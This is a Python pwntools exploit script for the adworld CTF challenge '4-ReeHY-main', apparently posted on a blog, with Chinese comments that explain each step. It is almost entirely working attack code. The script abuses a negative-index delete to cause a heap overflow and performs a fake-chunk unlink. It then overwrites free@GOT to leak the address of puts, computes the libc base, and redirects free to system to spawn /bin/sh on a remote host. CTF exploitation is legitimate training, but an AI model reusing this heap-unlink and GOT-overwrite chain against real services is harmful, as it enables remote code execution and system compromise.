堆溢出+unlink

#coding:utf-8
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
context.terminal = ['tmux','splitw','-h']
sh = remote("10.10.31.156","10001")
#sh = process(["/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/ld-2.23.so","./4-ReeHY-main"],env={"LD_PRELOAD":"/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/libc.so.6"})
 
sh.sendafter('$','sy\n')
sh.sendafter('$','1\n') #创造堆快0
sh.sendafter('Input size\n','256\n')
sh.sendafter('Input cun\n','0\n')
sh.sendafter('Input content','0000\n')
sh.sendafter('$','1\n')  #创造堆快1
sh.sendafter('Input size\n','256\n')
sh.sendafter('Input cun\n','1\n')
sh.sendafter('Input content','1111\n')
sh.sendafter('$','2\n')
sh.sendafter('Chose one to dele\n','-2\n')
 
sh.sendafter('$','1\n')   #这样申请之后，再写进序号为3的堆快，就是写入保存content大小的堆快，可以随意篡改输入大小造成堆溢出
sh.sendafter('Input size\n','20\n')
sh.sendafter('Input cun\n','3\n')
sh.sendafter('Input content','3333\n')
 
sh.sendafter('$','3\n')  #把chunk0的可写大小改为最大，4096
sh.sendafter('Chose one to edit\n','3\n')
sh.sendafter('Input the content\n',p32(0x1000))
 
payload = p64(0x0) + p64(0x100+1)+p64(0x6020c8) + p64(0x6020d0)+b'A'*(0x100-32)+p64(0x100) +p64(0x110)  #不改chunk1的size的话，size是0x111,表示前一个chunk分配
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','0\n')
print('**************************************************************send payload  fake_chunk1_size and chunk_fake_fd+chunk_fake_bk*********************************************************************************************')
sh.sendafter('Input the content\n',payload)
 
sh.sendafter('$','2\n')   #unlink
sh.sendafter('Chose one to dele\n','1\n')
 
puts_got = 0x602020
puts_plt = 0x4006d0
free_got = 0x602018      #把chunk0改为puts_got   chunk1改为free_got   chunk2的指针还改为0x6020e0方便再覆盖一遍
payload = p64(0x0) * 3 + p64(puts_got) + p64(0x1) + p64(free_got) + p64(0x1)+p64(0x6020e0) + p64(0x1)
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','0\n')
sh.sendafter('Input the content\n',payload)
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','1\n')  #修改free got里面内容为puts_plt
print('**************************************************************send payload2*********************************************************************************************')
sh.sendafter('Input the content\n',p64(puts_plt))
 
sh.sendafter('$','2\n')            #此时的free就是puts，这一步操作意思为 puts(*(puts_got))
sh.sendafter('Chose one to dele\n','0\n')
puts_addr =  u64(sh.recvline()[:-1].ljust(8,b'\x00'))
print(hex(puts_addr))
libc = ELF('libc6_2.23-0ubuntu11.2_amd64.so')
base_addr = puts_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh = base_addr + next(libc.search(b'/bin/sh'))
sh.sendafter('$','3\n')        #再把free改为system
sh.sendafter('Chose one to edit\n','1\n')
sh.sendafter('Input the content\n',p64(system_addr))
#再覆盖一次，前两项不变，把chunk2内容改为binsh的指针
#gdb.attach(sh,gdbscript='''b *0x400c29''')#edit
#payload =p64(puts_got) + p64(0x1) + p64(free_got) + p64(0x1)+p64(bin_sh) + p64(0x1)
payload =p64(0x1) + p64(0x1) + p64(0x1) + p64(0x1)+p64(bin_sh) + p64(0x1)
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','2\n')
sh.sendafter('Input the content\n',payload)
sh.sendafter('$','2\n')
sh.sendafter('Chose one to dele\n','2\n')# system('/bin/sh')
sh.interactive()
My blog

adworld-4-ReeHY-main-100

堆溢出+unlink
